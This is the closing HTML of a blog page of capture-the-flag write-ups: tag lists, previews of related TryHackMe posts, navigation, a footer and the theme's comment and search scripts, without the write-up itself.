    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/enumeration/">enumeration</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/linux/">linux</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/web/">web</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/easy/">easy</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/medium/">medium</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/misconfiguration/">misconfiguration</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/ctf/">ctf</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/git/">git</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/access-control-bypass/">access-control-bypass</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/active-directory/">active-directory</a>
      
    </div>
  </section>


            </div>

            
              
              






  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-2 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>


            
          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->















  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
    
  

  

  

  

  

  











  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/Capture/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1754690400"
  data-df="ll"
  
>
  Aug  9, 2025
</time>

              <h4 class="pt-0 my-2">Capture - TryHackMe</h4>
              <div class="text-muted">
                <p>Can you bypass the login form?  This machine, named Capture!, is part of TryHackMe and rated as an easy challenge. It offers a great opportunity to practice fundamental web enumeration and brute fo...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/TakeOver/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1750543200"
  data-df="ll"
  
>
  Jun 22, 2025
</time>

              <h4 class="pt-0 my-2">TakeOver - TryHackMe</h4>
              <div class="text-muted">
                <p>This machine is part of TryHackMe and is rated as an easy-level Linux challenge. While its rating suggests a straightforward box, TakeOver delivers a great hands-on introduction to SSL certificate ...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/MD2PDF/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1749420000"
  data-df="ll"
  
>
  Jun  9, 2025
</time>

              <h4 class="pt-0 my-2">MD2PDF - TryHackMe</h4>
              <div class="text-muted">
                <p>This machine is part of TryHackMe and is rated as an easy-level Linux challenge. Despite its rating, it offers a solid introduction to web enumeration, access control bypass, and creative client-si...</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->


            
              
              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
  

  
    <a
      href="/posts/Code/"
      class="btn btn-outline-primary"
      aria-label="Older"
    >
      <p>Code - Hack The Box</p>
    </a>
  

  
    <a
      href="/posts/Dog/"
      class="btn btn-outline-primary"
      aria-label="Newer"
    >
      <p>Dog - Hack The Box</p>
    </a>
  
</nav>

            

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2025</time>

    
      <a href="https://github.com/x-pwn3d">x-pwn3d</a>.
    

    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>

  <p>Using the <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.2.4"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/enumeration/">enumeration</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/linux/">linux</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/web/">web</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/easy/">easy</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/medium/">medium</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/misconfiguration/">misconfiguration</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/ctf/">ctf</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/git/">git</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/access-control-bypass/">access-control-bypass</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/active-directory/">active-directory</a>
      
    </div>
  </section>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    

    <!-- Embedded scripts -->

    
      
      <!-- The comments switcher -->

  
  <!-- https://utteranc.es/ -->
<script>
  (function () {
    const origin = 'https://utteranc.es';
    const themeMapper = Theme.getThemeMapper('github-light', 'github-dark');
    const initTheme = themeMapper[Theme.visualState];

    let script = document.createElement('script');
    script.src = 'https://utteranc.es/client.js';
    script.setAttribute('repo', 'x-pwn3d/writeups');
    script.setAttribute('issue-term', 'pathname');
    script.setAttribute('theme', initTheme);
    script.crossOrigin = 'anonymous';
    script.async = true;

    const $footer = document.querySelector('footer');
    $footer.insertAdjacentElement('beforebegin', script);

    addEventListener('message', (event) => {
      let newTheme;if (event.source === window && event.data && event.data.id === Theme.ID) {
        newTheme = themeMapper[Theme.visualState];

        const message = {
          type: 'set-theme',
          theme: newTheme
        };

        const utterances = document.querySelector('.utterances-frame').contentWindow;
        utterances.postMessage(message, origin);
      }
    });
  })();
</script>



    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{content}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>

